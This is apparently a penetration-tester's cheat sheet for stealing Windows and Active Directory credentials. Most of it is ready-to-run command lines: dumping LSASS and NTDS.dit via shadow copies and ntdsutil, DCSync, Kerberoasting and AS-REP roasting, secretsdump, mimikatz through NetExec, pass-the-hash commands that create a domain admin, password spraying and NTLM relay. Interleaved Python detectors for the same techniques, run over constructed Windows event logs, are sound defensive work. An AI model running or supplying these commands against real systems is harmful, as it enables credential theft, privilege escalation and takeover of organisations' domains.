Credential Access
The adversary is trying to steal account names and passwords. https://attack.mitre.org/tactics/TA0006/
SecureString to Plaintext
$SecPass = "<SECURE PASS STRING>" | ConvertTo-SecureString;
(New-Object System.Management.Automation.PSCredential "N/A", $SecPass).GetNetworkCredential().Password;
Passwords in Description
ActiveDirectory Module
Get-ADUser -Filter 'Description -like "*password*"' -Properties Description | select name,Description
Using PowerView.ps1
GitHub: https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
Find-UserField -SearchField Description -SearchTerm "password"
Volume Shadow Creation
# creating volume shadow copy
wmic /node:"[AD_IP_address]" /user:"[username]" /password:"[password]" process call create "cmd /c vssadmin create shadow /for=C: 2>&1"
# copying NTDS.dit, SYSTEM and SECURITY files from shadow copy
wmic /node:"[AD_IP_address]" /user:"[username]" /password:"[password]" process call create "cmd /c copy \\[shadow_copy_dir]\Windows\NTDS\NTDS.dit [target_folder] & copy \\[shadow_copy_dir]\Windows\System32\config\SYSTEM [target_folder] & copy \\[shadow_copy_dir]\Windows\System32\config\SECURITY [target_folder]"
# compressing files for exfiltration
7za.exe a -mx3 nt.7z \\[AD_IP_address]\c$\[target_folder]
Stored Credential Enumeration
You can use the cmdkey command or keymgr.dll (requires a GUI) to list stored credentials. Additionally, you can use the output in a runas command to authenticate.
Listing saved credentials:
cmdkey /list
Listing saved credentials in a desktop environment:
rundll32.exe keymgr.dll, KRShowKeyMgr
Using saved credentials:
runas /savecred /user:jmith cmd.exe
Dumping LSASS with rundll32.exe
rundll32.exe
Same behavior as right-clicking the process in Task Manager and dumping LSASS manually (624 below is the LSASS PID).
.\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 624 C:\temp\lsass.dmp full
Memory Dump with Get-StorageDiagnosticInfo
Get-StorageDiagnosticInfo
Source: https://x.com/0gtweet/status/1440255495797764108 https://docs.microsoft.com/en-us/powershell/module/storage/get-storagediagnosticinfo?view=windowsserver2019-ps
# -ExpandProperty is required: Select -Property returns an object, not the string the next cmdlet expects
$fname = Get-StorageSubSystem | Select -ExpandProperty FriendlyName
Get-StorageDiagnosticInfo -StorageSubSystemFriendlyName $fname -IncludeLiveDump -DestinationPath C:\
Mount VHD, pull SAM
guestmount --add GoldenWindows11x64.vhdx --inspector --ro -v /mnt
cd /mnt/Windows/System32/config
cp SAM SYSTEM /root && cd /root && guestunmount /mnt
secretsdump.py -sam /root/SAM -system /root/SYSTEM local
Targeted Kerberoasting with PowerSploit
Get-DomainUser 'victimuser' | Select serviceprincipalname
Set-DomainObject -Identity 'victimuser' -Set @{serviceprincipalname='nonexistent/BLAHBLAH'}
# Obtain a kerberoast hash to crack
$User = Get-DomainUser 'victimuser'
$User | Get-DomainSPNTicket | fl
# Clear the SPNs of the target account
$User | Select serviceprincipalname
Set-DomainObject -Identity victimuser -Clear serviceprincipalname
Dumping NTDS with ntdsutil.exe
ntdsutil.exe
powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"
DSInternals
DSInternals found here: https://github.com/MichaelGrafnetter/DSInternals
DCSync with Get-ADReplAccount
Get-ADReplAccount
Credit to @Mastadon.
Get-ADReplAccount -Server <DC FQDN> -All | Where { $_.Enabled -eq $True} | Format-Custom -View PwDump | tee hashes.ntds ; if($?) {cat .\hashes.ntds | select-string -NotMatch '\$', '\$DUPLICATE', 'IWAM_', 'IUSR_', 'ASPNET', 'HelpAssistant', 'SUPPORT_', 'Guest', 'DefaultAccount', 'HealthMailbox' |%{$_.Line.Trim()} | ? {$_.Trim() -ne "" }| Sort | Get-Unique | Out-File -encoding ASCII hashes_sorted.txt}
Extracting from NTDS, SYSTEM, SECURITY
You may have to modify the following registry key: HKLM\System\CurrentControlSet\Control\Lsa\FipsAlgorithmPolicy and set "Enabled" to 0
Install-Module DSInternals;
Import-Module DSInternals;
$key = Get-BootKey -SystemHivePath '.\registry\SYSTEM';
Get-ADDBAccount -DistinguishedName 'CN=krbtgt,CN=Users,DC=burmat,DC=local' -DBPath '.\Active Directory\ntds.dit' -BootKey $key;
Extracting NTDS with ntdsutil.exe
ntdsutil.exe
C:\> ntdsutil
ntdsutil: activate instance ntds
ntdsutil: ifm
ifm: create full c:\pentest
ifm: quit
ntdsutil: quit
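From the defender's side, the techniques in the Volume Shadow Creation, LSASS dump via rundll32, Get-StorageDiagnosticInfo, stored-credential runas and ntdsutil sections all leave a distinctive process command line (Sysmon Event ID 1 or Security 4688). The following is an added example, not code from this page or any tool it references: a small rule set keyed on those command-line shapes, run over constructed sample events. Rule names, the ProcessEvent fields and the sample hosts, users and paths are all assumptions made for the example.

```python
import re
from dataclasses import dataclass


# Minimal process-creation record; field names mirror Sysmon EID 1 / Security 4688
# (constructed for this example, not a real log schema).
@dataclass
class ProcessEvent:
    host: str
    user: str
    image: str
    command_line: str


# Rule name -> pattern over the command line. The patterns follow the command shapes
# shown on this page; real command lines vary, so treat a hit as a triage lead.
RULES = {
    "shadow_copy_created": re.compile(r"\bvssadmin(\.exe)?\s+create\s+shadow\b", re.I),
    "lsass_minidump_comsvcs": re.compile(r"\brundll32.*comsvcs(\.dll)?\s*,\s*MiniDump\b", re.I),
    # IFM media creation is also legitimate during DC promotion: check change records.
    "ntdsutil_ifm_export": re.compile(r"\bntdsutil.*\b(ifm|create\s+full)\b", re.I),
    "storage_live_dump": re.compile(r"Get-StorageDiagnosticInfo.*-IncludeLiveDump", re.I),
    "runas_saved_credential": re.compile(r"\brunas(\.exe)?\b.*/savecred", re.I),
    "remote_wmic_process_create": re.compile(r"\bwmic\s+/node:.*process\s+call\s+create", re.I),
}


def match_rules(event: ProcessEvent) -> list[str]:
    """Return the names of every rule whose pattern matches the command line."""
    return [name for name, rx in RULES.items() if rx.search(event.command_line)]


def scan(events) -> list[dict]:
    """Run every rule over every event and return one finding per (event, rule) hit."""
    findings = []
    for ev in events:
        for name in match_rules(ev):
            findings.append({"rule": name, "host": ev.host, "user": ev.user,
                             "command_line": ev.command_line})
    return findings


def hosts_with_findings(findings) -> dict[str, list[str]]:
    """Group the rule names that fired by host, preserving event order."""
    out: dict[str, list[str]] = {}
    for f in findings:
        out.setdefault(f["host"], []).append(f["rule"])
    return out


# Constructed sample events: four that should fire and two benign ones that should not.
SAMPLE_EVENTS = [
    ProcessEvent("DC01", r"CORP\svc_backup", r"C:\Windows\System32\vssadmin.exe",
                 "vssadmin create shadow /for=C:"),
    ProcessEvent("WS07", r"CORP\jsmith", r"C:\Windows\System32\rundll32.exe",
                 r".\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 624 C:\temp\lsass.dmp full"),
    ProcessEvent("DC01", r"CORP\jsmith", r"C:\Windows\System32\cmd.exe",
                 r'''powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"'''),
    # The operator-side wmic launch matches two rules: the remote create and the embedded vssadmin.
    ProcessEvent("WS07", r"CORP\jsmith", r"C:\Windows\System32\wbem\WMIC.exe",
                 r'wmic /node:"10.0.0.5" /user:"corp\admin" /password:"[redacted]" '
                 r'process call create "cmd /c vssadmin create shadow /for=C: 2>&1"'),
    ProcessEvent("WS07", r"CORP\helpdesk", r"C:\Windows\System32\vssadmin.exe",
                 "vssadmin list shadows"),                       # routine admin, no hit
    ProcessEvent("WS07", r"CORP\jsmith", r"C:\Windows\explorer.exe", "explorer.exe"),
]


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f['host']:5} {f['rule']:28} {f['user']:18} {f['command_line'][:60]}")
```

The rules deliberately match the argument structure (for example `create shadow`, not just `vssadmin`) so that routine administration such as listing shadow copies does not page anyone; in a SIEM the same logic maps onto a Sigma rule with a `contains|all` selection per entry.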
Impacket
GetUserSPNs.py
Kerberoasting
GetUserSPNs.py -request -dc-ip 10.10.10.123 burmat.local/xsvc:S3cur3PW123
GetNPUsers.py
AS-REP Roasting - Attempt to get TGTs for users that have UF_DONT_REQUIRE_PREAUTH set:
GetNPUsers.py -request -no-pass -dc-ip 10.10.10.123 burmat.local/ -usersfile users.txt
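Both Kerberoasting (GetUserSPNs.py, and the targeted PowerView variant above) and AS-REP roasting show up in domain controller Security logs: a burst of 4769 service-ticket requests for many user-backed SPNs with RC4 (etype 0x17) from one requester, and 4768 events issued without pre-authentication (PreAuthType 0). The following is an added example, not code from this page or from Impacket: two detectors run over constructed sample events. The event field names follow the 4768/4769 XML names, while the thresholds, window, sample accounts and IPs are assumptions for the example.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

RC4_HMAC = "0x17"                    # TicketEncryptionType value for RC4-HMAC (etype 23)
ROAST_WINDOW = timedelta(seconds=60)  # assumption: tune to the environment
ROAST_THRESHOLD = 3                  # distinct user-backed SPNs per requester in the window


def _ts(ev):
    return datetime.fromisoformat(ev["TimeCreated"])


def _system_account(name):
    """Machine accounts and krbtgt are not roastable targets; skip them."""
    n = name.lower()
    return n.endswith("$") or n.split("/")[0] == "krbtgt"


def detect_kerberoasting(events, threshold=ROAST_THRESHOLD, window=ROAST_WINDOW):
    """Flag requesters that obtain RC4 service tickets for many distinct
    user-backed SPNs inside a short window (Security Event ID 4769)."""
    tgs = sorted((e for e in events if e["EventID"] == 4769), key=_ts)
    recent = defaultdict(deque)      # requester -> deque of (timestamp, service)
    alerts = {}
    for e in tgs:
        if e["TicketEncryptionType"].lower() != RC4_HMAC or _system_account(e["ServiceName"]):
            continue
        now = _ts(e)
        q = recent[e["TargetUserName"]]
        q.append((now, e["ServiceName"].lower()))
        while now - q[0][0] > window:    # slide the window; the newest entry always stays
            q.popleft()
        distinct = {svc for _, svc in q}
        if len(distinct) >= threshold:
            alerts[e["TargetUserName"]] = {
                "requester": e["TargetUserName"], "source_ip": e["IpAddress"],
                "distinct_services": len(distinct), "services": sorted(distinct)}
    return list(alerts.values())


def detect_asrep_roasting(events):
    """Flag successful AS-REQs answered without pre-authentication (4768,
    PreAuthType 0) for user accounts, with RC4 selected for the reply."""
    return [
        {"account": e["TargetUserName"], "source_ip": e["IpAddress"]}
        for e in events
        if e["EventID"] == 4768
        and e.get("PreAuthType") == "0"
        and e["TicketEncryptionType"].lower() == RC4_HMAC
        and not _system_account(e["TargetUserName"])
    ]


def _tgs(t, user, svc, etype, ip):
    return {"EventID": 4769, "TimeCreated": t, "TargetUserName": user, "ServiceName": svc,
            "TicketEncryptionType": etype, "IpAddress": ip, "Status": "0x0"}


def _asreq(t, user, preauth, etype, ip):
    return {"EventID": 4768, "TimeCreated": t, "TargetUserName": user, "PreAuthType": preauth,
            "TicketEncryptionType": etype, "IpAddress": ip, "Status": "0x0"}


# Constructed sample: one requester sweeps four service accounts in three seconds.
SAMPLE_EVENTS = [
    _tgs("2024-05-01T09:00:01", "jsmith@BURMAT.LOCAL", "xsvc", "0x17", "10.10.1.141"),
    _tgs("2024-05-01T09:00:02", "jsmith@BURMAT.LOCAL", "sqlsvc", "0x17", "10.10.1.141"),
    _tgs("2024-05-01T09:00:02", "jsmith@BURMAT.LOCAL", "httpsvc", "0x17", "10.10.1.141"),
    _tgs("2024-05-01T09:00:03", "jsmith@BURMAT.LOCAL", "backupsvc", "0x17", "10.10.1.141"),
    _tgs("2024-05-01T09:00:03", "jsmith@BURMAT.LOCAL", "DC01$", "0x17", "10.10.1.141"),  # machine SPN, ignored
    _tgs("2024-05-01T09:05:00", "alice@BURMAT.LOCAL", "sqlsvc", "0x12", "10.10.1.50"),   # AES, normal use
    _tgs("2024-05-01T09:06:00", "bob@BURMAT.LOCAL", "legacysvc", "0x17", "10.10.1.51"),  # single RC4 ticket
    _asreq("2024-05-01T09:10:00", "svc_legacy", "0", "0x17", "10.10.1.141"),            # no pre-auth
    _asreq("2024-05-01T09:10:05", "alice", "2", "0x12", "10.10.1.50"),                   # PA-ENC-TIMESTAMP
]

if __name__ == "__main__":
    print(detect_kerberoasting(SAMPLE_EVENTS))
    print(detect_asrep_roasting(SAMPLE_EVENTS))
```

Bob's single RC4 ticket stays under the threshold, which is the point: legacy services that still negotiate RC4 produce those every day, and the signal is the breadth of distinct SPNs per requester, not RC4 on its own. The AS-REP rule is a straight filter because accounts with pre-authentication disabled should be rare enough to review individually.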
secretsdump.py
Using secretsdump to steal credentials.
Extracting Credentials Remotely
secretsdump.py -just-dc-ntlm burmat.local/administrator@10.10.10.123
Offline NTDS Cracking
secretsdump.py -ntds ./ntds.dit -system SYSTEM LOCAL -output dump.ntds -user-status
Resetting Credentials with smbpasswd.py
Reset a password when you have the credentials but the password has expired. Also useful if you have a hash and no password.
smbpasswd -r 10.0.0.12 -U 'burmat'
NetExec
GitHub repo: https://github.com/Pennyw0rth/NetExec
Pass-the-Hash
Because hashes are just as good:
# create a user
nxc smb 10.10.10.123 -u 'administrator' -d 'burmat.local' -H 'd7452863d1e8e15241nn50ceb1ab9dfe' -x 'net user burmat Pwn3dPwn3d! /add /domain'
# add to domain admins
nxc smb 10.10.10.123 -u 'administrator' -d 'burmat.local' -H 'd7452863d1e8e15241nn50ceb1ab9dfe' -x 'net group "Domain Admins" /add burmat /domain'
SMB Password Spraying
Switch out usernames/passwords/targets with lists:
## to spray the password Spring2024! with a list of users against a list of targets:
nxc smb 'targets.txt' -u 'users.txt' -p 'Spring2024!' -d 'burmat.local'
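A spray across a target list leaves only a handful of 4625 failures on each host, so the detection has to run over centrally collected logs and key on the source address rather than on any one target account. The following is an added example, not code from this page or from NetExec: a windowed detector over constructed 4625 events that counts distinct usernames per source IP. The window, threshold, sample IPs and usernames are assumptions for the example; the two sub-status codes are the standard 4625 values for a wrong password and an unknown user.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# 4625 SubStatus values that a spray produces; lockouts and disabled accounts are excluded
# so that the count reflects guesses, not their side effects.
BAD_PASSWORD = "0xc000006a"
UNKNOWN_USER = "0xc0000064"
SPRAY_WINDOW = timedelta(minutes=10)   # assumption: tune to the environment
SPRAY_THRESHOLD = 5                    # distinct usernames from one source in the window


def detect_password_spray(events, threshold=SPRAY_THRESHOLD, window=SPRAY_WINDOW):
    """Flag source IPs that fail logons for many distinct accounts in a short window.
    A single account with many failures is brute force, not a spray, and is not flagged here."""
    fails = sorted(
        (e for e in events
         if e["EventID"] == 4625 and e["SubStatus"].lower() in (BAD_PASSWORD, UNKNOWN_USER)),
        key=lambda e: e["TimeCreated"])
    per_source = defaultdict(list)     # ip -> [(timestamp, username)]
    alerts = {}
    for e in fails:
        ts = datetime.fromisoformat(e["TimeCreated"])
        bucket = per_source[e["IpAddress"]]
        bucket.append((ts, e["TargetUserName"].lower()))
        while ts - bucket[0][0] > window:      # drop entries that fell out of the window
            bucket.pop(0)
        users = {u for _, u in bucket}
        if len(users) >= threshold:
            alerts[e["IpAddress"]] = {
                "source_ip": e["IpAddress"], "distinct_users": len(users),
                "attempts": len(bucket), "first_seen": bucket[0][0].isoformat()}
    return list(alerts.values())


def _fail(t, user, ip, host, sub):
    return {"EventID": 4625, "TimeCreated": t, "TargetUserName": user, "IpAddress": ip,
            "Computer": host, "SubStatus": sub}


# Constructed sample: one source walks six accounts across three hosts; another source is
# one user mistyping a password and then getting locked out.
SAMPLE_EVENTS = [
    _fail("2024-05-01T10:00:00", "jsmith", "10.10.1.141", "FS01", "0xC000006A"),
    _fail("2024-05-01T10:00:01", "alice", "10.10.1.141", "FS01", "0xC000006A"),
    _fail("2024-05-01T10:00:01", "bob", "10.10.1.141", "FS02", "0xC000006A"),
    _fail("2024-05-01T10:00:02", "carol", "10.10.1.141", "FS02", "0xC0000064"),
    _fail("2024-05-01T10:00:02", "dave", "10.10.1.141", "WEB01", "0xC000006A"),
    _fail("2024-05-01T10:00:03", "erin", "10.10.1.141", "WEB01", "0xC000006A"),
    _fail("2024-05-01T10:02:00", "alice", "10.10.1.50", "FS01", "0xC000006A"),
    _fail("2024-05-01T10:02:10", "alice", "10.10.1.50", "FS01", "0xC000006A"),
    _fail("2024-05-01T10:02:20", "alice", "10.10.1.50", "FS01", "0xC0000234"),   # locked out, not counted
]

if __name__ == "__main__":
    for a in detect_password_spray(SAMPLE_EVENTS):
        print(a)
```

Because the per-host count is so low, per-host lockout thresholds rarely trip on a spray; the centralized per-source count is what catches it, and the `first_seen` timestamp is where triage starts.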
Dumping Remote PowerShell History
nxc smb 10.250.1.33 -u 'dev001' -p 'burmat123$' -d 'burmat.local' -M powershell_history
Extracting Credentials
## mimikatz module
nxc smb 10.10.10.123 -u 'administrator' -d 'burmat.local' -p 'S3cur3PW123' -M mimikatz -o COMMAND='privilege::debug'
## SAM database
nxc smb 10.10.10.123 -u 'administrator' -d 'burmat.local' -p 'S3cur3PW123' --sam
Relaying to DCSync
ntlmrelayx.py -t DCSYNC://172.16.1.200 -smb2support -debug
python3 dementor.py -d burmat.local -u jsmith -p 'S3cur3PASS123$' 10.10.1.141 172.16.1.23 -debug
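Whether the replication request comes from DSInternals' Get-ADReplAccount (above) or from a relayed session handed to ntlmrelayx's DCSYNC target, the domain controller logs a Security Event ID 4662 on the domain object whose Properties list the directory-replication control-access rights. The following is an added example, not code from this page, DSInternals or Impacket: a detector that extracts those right GUIDs from 4662 events and alerts when the subject is not a known replicator. The three GUIDs are the well-known controlAccessRight identifiers; the allowlist entries, sample subjects and object names are assumptions for the example.

```python
import re

# Well-known GUIDs of the replication control-access rights as they appear in 4662 Properties.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RX = re.compile(r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}", re.I)

# Identities expected to replicate: the domain controllers' machine accounts and any
# directory-sync service account. Names below are constructed placeholders.
DEFAULT_ALLOWED = {"DC01$", "DC02$", "MSOL_sync_example"}


def replication_rights(properties: str) -> list[str]:
    """Return the human-readable replication rights named in a 4662 Properties field."""
    return sorted({REPLICATION_RIGHTS[g.lower()] for g in GUID_RX.findall(properties)
                   if g.lower() in REPLICATION_RIGHTS})


def detect_dcsync(events, allowed=DEFAULT_ALLOWED) -> list[dict]:
    """Alert on 4662 events that exercise full-replication rights from a subject that is
    not an allowlisted replicator. Get-Changes alone is not enough to pull secrets, so it
    is reported only alongside Get-Changes-All or the filtered-set right."""
    allowed_lc = {a.lower() for a in allowed}
    alerts = []
    for e in events:
        if e["EventID"] != 4662:
            continue
        rights = replication_rights(e["Properties"])
        if ("DS-Replication-Get-Changes-All" not in rights
                and "DS-Replication-Get-Changes-In-Filtered-Set" not in rights):
            continue
        if e["SubjectUserName"].lower() in allowed_lc:
            continue
        # For the relay case the subject is the relayed user; the originating host comes
        # from the 4624 network logon that precedes this event, which 4662 itself lacks.
        alerts.append({"subject": e["SubjectUserName"], "domain": e["SubjectDomainName"],
                       "object": e["ObjectName"], "rights": rights})
    return alerts


FULL_REPL = ("{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"
             "\n\t{19195a5b-6da0-11d0-afd3-00c04fd930c9}")   # last GUID: domainDNS object class


def _ev(subject, obj, props):
    return {"EventID": 4662, "SubjectUserName": subject, "SubjectDomainName": "BURMAT",
            "ObjectName": obj, "Properties": props}


# Constructed sample: one legitimate DC, one sync account, one user with full replication
# rights (the alert), one ordinary attribute read, and one Get-Changes-only request.
SAMPLE_EVENTS = [
    _ev("DC02$", "DC=burmat,DC=local", FULL_REPL),
    _ev("jsmith", "DC=burmat,DC=local", FULL_REPL),
    _ev("MSOL_sync_example", "DC=burmat,DC=local", FULL_REPL),
    _ev("alice", "CN=alice,CN=Users,DC=burmat,DC=local", "{bf967aba-0de6-11d0-a285-00aa003049e2}"),
    _ev("helpdesk", "DC=burmat,DC=local", "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"),
]

if __name__ == "__main__":
    for a in detect_dcsync(SAMPLE_EVENTS):
        print(a)
```

The allowlist is the part that needs care: it must be the domain controllers' own machine accounts and the sync identities actually in use, not every account ending in `$`, since a workstation's machine account granted replication rights is exactly the case worth catching. Auditing the rights themselves (who holds Get-Changes-All on the domain head) closes the loop from detection back to least privilege.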